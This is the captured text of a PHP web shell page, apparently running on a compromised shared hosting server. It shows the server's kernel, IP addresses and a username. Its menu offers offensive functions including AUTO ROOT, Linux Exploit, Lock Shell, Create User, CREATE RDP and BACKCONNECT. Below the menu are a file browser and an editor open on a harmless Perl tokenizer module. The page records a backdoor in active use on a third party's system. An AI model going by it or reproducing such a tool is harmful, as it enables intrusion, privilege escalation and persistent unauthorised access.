Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Plucene /
Analysis /
[ HOME SHELL ]
Name
Size
Permission
Action
Standard
[ DIR ]
drwxr-xr-x
Analyzer.pm
864
B
-rw-r--r--
CharTokenizer.pm
1.58
KB
-rw-r--r--
LetterTokenizer.pm
532
B
-rw-r--r--
LowerCaseFilter.pm
627
B
-rw-r--r--
LowerCaseTokenizer.pm
421
B
-rw-r--r--
PorterStemFilter.pm
1.72
KB
-rw-r--r--
SimpleAnalyzer.pm
799
B
-rw-r--r--
StopAnalyzer.pm
1.09
KB
-rw-r--r--
StopFilter.pm
934
B
-rw-r--r--
Token.pm
1.21
KB
-rw-r--r--
TokenFilter.pm
548
B
-rw-r--r--
Tokenizer.pm
851
B
-rw-r--r--
WhitespaceAnalyzer.pm
795
B
-rw-r--r--
WhitespaceTokenizer.pm
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Token.pm
package Plucene::Analysis::Token; =head1 NAME Plucene::Analysis::Token - A term in a field =head1 SYNOPSIS =head1 DESCRIPTION A Token is an occurence of a term from the text of a field. It consists of a term's text, the start and end offset of the term in the text of the field, and a type string. The start and end offsets permit applications to re-associate a token with its source text, e.g., to display highlighted query terms in a document browser, or to show matching text fragments in a KWIC (KeyWord In Context) display, etc. The type is an interned string, assigned by a lexical analyzer (a.k.a. tokenizer), naming the lexical or syntactic class that the token belongs to. For example an end of sentence marker token might be implemented with type "eos". The default token type is "word". =head1 METHODS =cut use strict; use warnings; use base 'Class::Accessor::Fast'; __PACKAGE__->mk_accessors(qw[type text start end]); =head2 new my $token = Plucene::Analysis::Token->new({ type => $type, text => $text, start => $start, end => $end }); This will create a new Plucene::Analysis::Token object. =cut sub new { my ($class, %args) = @_; $args{type} ||= "word"; $class->SUPER::new({%args}); } 1;
Close